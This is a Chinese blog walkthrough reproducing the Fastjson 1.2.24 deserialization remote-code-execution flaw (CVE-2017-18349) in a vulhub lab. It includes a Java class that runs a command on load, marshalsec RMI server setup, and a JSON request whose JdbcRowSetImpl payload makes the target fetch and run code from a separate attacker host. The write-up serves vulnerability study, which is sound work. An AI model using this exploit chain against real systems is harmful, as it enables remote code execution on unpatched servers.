Fastjson 1.2.24 反序列化(CVE-2017-18349)

最新推荐文章于 2024-05-20 12:42:00 发布
最新推荐文章于 2024-05-20 12:42:00 发布
阅读量3.3k 收藏 2
点赞数 2
分类专栏: 中间件漏洞复现 文章标签: 中间件 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/109958951
版权

声明

好好学习,天天向上

漏洞描述

CVE-2017-18349,前台无回显RCE
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

影响范围

fastjson<=1.2.24

复现过程

这里使用1.2.24版本

使用vulhub

cd /app/vulhub-20201028/fastjson/1.2.24-rce

使用docker启动

docker-compose up -d

拉镜像以后,访问IP:8090

访问,可看到json格式输出

http://192.168.239.129:8090

在这里插入图片描述

新建一个TouchFile.java,并编译成class文件

javac TouchFile.java

文件内容

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/cve-2017-18349"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

使用python开启站点

python -m SimpleHTTPServer  1111

192.168.239.139:1111/TouchFile.class

在这里插入图片描述

然后借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class:(marshalsec-0.0.3-SNAPSHOT-all.jar需要下载,编译,特别坑)

安装marshalsec,mvn也是需要安装的,不过这个很简单,和java一模一样

git clone https://github.com/mbechler/marshalsec.git

cd marshalsec

mvn clean package -DskipTests

装好后运行

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.239.139:1111/#TouchFile" 9999

在这里插入图片描述

发送请求包

POST / HTTP/1.1
Host: 192.168.239.129:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 274

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.239.139:9999/TouchFile",
        "autoCommit":true
    }
}

在这里插入图片描述

在这里插入图片描述

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Fastjson代码执行漏洞 [CVE-2022-25845].md
07-09
Fastjson代码执行漏洞 [CVE-2022-25845]
fastjson-1.2.24
04-24
fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
Fastjson反序列化漏洞原理与漏洞复现(CVE-2017-18349
wangzhifei1的博客
01-15 1639
Fastjson是一个由阿里巴巴开源的Java库,用于将 Java 对象转换成其 JSON 表示形式,也可以用来将 JSON 字符串转换成等效的 Java 对象。这个过程通常称为序列化和反序列化Fastjson 反序列化是指将 JSON 字符串转换为 Java 对象的过程。
Fastjson漏洞之CVE-2017-18349
GalaxySpaceX的博客
05-20 1167
Fastjson漏洞之CVE-2017-18349
Fastjson 1.2.24 反序列化导致任意命令执行漏洞复现(CVE-2017-18349
Welcome To Myon'Blog !
03-09 2053
Fastjson 是一个 Java 库,用于在 Java 对象和 JSON 数据之间进行转换,它提供了一种简单而高效的方式来序列化 Java 对象为 JSON 格式的字符串,以及将 JSON 字符串反序列化为 Java 对象。Fastjson 支持各种类型的 Java 对象,包括预先存在但没有源代码的对象。
fastjson反序列化漏洞(CVE-2017-18349)
rumil的博客
09-19 500
fastjson中,在反序列化的时候 jdk中 的 jdbcRowSetImpl 类一定会被执行,我们给此类中的 setDataSourcesName 输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞。它没有用java的序列化机制,而是自定义了一套序列化机制。"JSON.toJSONString"是Java语言中com.alibaba.fastjson.JSON类提供的一个方法,用于将Java对象转换为JSON格式的字符串。
Fastjson1.2.24反序列化导致任意命令执行(CVE-2017-18349)
m0_58596609的博客
01-05 1384
Fastjson1.2.24反序列化导致任意命令执行(CVE-2017-18349) 超详细
fastjson 1.2.24 反序列化 RCE 漏洞复现(CVE-2017-18349)
一个top2本科学渣的救赎之路
04-23 6276
fastjson 1.2.24 反序列化导致任意命令执行漏洞,可获得服务器root权限
fastjson1.2.24反序列化RCE
最新发布
06-24
**Fastjson 1.2.24 反序列化远程代码执行漏洞详解** 在Java开发中,Fastjson是一个广泛使用的高性能JSON库,它提供了一种快速解析和生成JSON的机制。然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本...
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
本篇将详细介绍如何在Spring Boot中配置Fastjson进行序列化和反序列化,以实现与Redis的高效交互。 Fastjson是阿里巴巴开发的一款高性能的JSON处理库,它提供了快速的序列化和反序列化能力,支持多种Java类型,包括...
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
在Spring MVC中,Fastjson是一个常用的JSON库,用于序列化和反序列化Java对象。当我们在处理日期时间字段时,可能会遇到反序列化时日期格式不一致的问题,导致默认显示为时间戳。本文将详细介绍两种解决Spring MVC中...
fastjson-1.2.54-API文档-中文版.zip
07-09
赠送jar包:fastjson-1.2.54.jar; 赠送原API文档:fastjson-1.2.54-javadoc.jar; 赠送源代码:fastjson-1.2.54-sources.jar; 赠送Maven依赖信息文件:fastjson-1.2.54.pom; 包含翻译后的API文档:fastjson-...
fastjson复现-详细
赵花花08042的博客
11-11 3087
https://vulhub.org/#/environments/fastjson/1.2.24-rce/ http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/ https://www.freebuf.com/vuls/208339.
【Web】浅聊Fastjson原生反序列化——原理与高版本绕过
uuzeray的博客
03-22 1736
当向List、set、map这些涉及哈希表的类型中写入对象时,会在handles这个哈希表中建立从对象到引用的映射,当再次写入同一对象时,在handles这个hash表中查到了映射,就会通过writeHandle将重复对象以引用类型写入,自然readObject反序列化的时候也就会走到readHandle分支。经p4d0rn师傅提醒,序列化的时候会带上很多不必要的属性,比如父类的类名之类的信息都会被带上,payload是有缩短的空间的。
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3041
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
fastJson序列化与反序列化
qq_43663493的博客
10-05 2351
Java泛型是jdk1.5引入的一个新特性。泛型的本质是参数化类型,也就是说操作的数据类型被指定为一个参数。
[Vulhub] fastjson 1.2.24 RCE && 1.2.47 RCE
weixin_45605352的博客
08-14 1846
fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349) 0x00 预备知识 RMI: RMI(Remote Method Invocation)为远程方法调用,是允许运行在一个Java虚拟机的对象调用运行在另一个Java虚拟机上的对象的方法。 这两个虚拟机可以是运行在相同计算机上的不同进程中,也可以是运行在网络上的不同计算机中。 Java RMI:Java远程方法调用,即Java RMI(Java Remote Method Invocation)是Java编程语言里,
[漏洞复现]Fastjson1.2.24反序列化环境搭建+漏洞复现
cj_Hydra's Blog
11-02 1354
前言: Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson 特性: 提供服务器端、安卓客户端两种解析工具,性能表现较好。 提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符串,pa
【Vulfocus漏洞复现】fastjson-cnvd_2017_02833、fastjson-cnvd_2019_22238
weixin_45632448的博客
04-12 4414
vps:centos8 腾讯云 本地:windows11 靶场环境:http://123.58.236.76:24477/ 访问靶场环境:http://123.58.236.76:24477/ burp进行抓包,将请求方式改为POST,能够请求json数据,可能存在fastjson漏洞 准备两个东西:Exploit.class、marshalsec-0.0.3-SNAPSHOT-all.jar(准备过程不详述,网上都有) 在本地创建Exploit.java,内容如下 import java.io.Buf
fastjson 1.2.24 反序列化导致任意命令执行漏洞
03-16
fastjson 1.2.24 存在反序列化漏洞,攻击者可以利用该漏洞执行任意命令。该漏洞的原因是 fastjson反序列化时未对恶意数据进行足够的校验,导致攻击者可以构造恶意数据,使其被 fastjson 解析时执行任意命令。建议...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值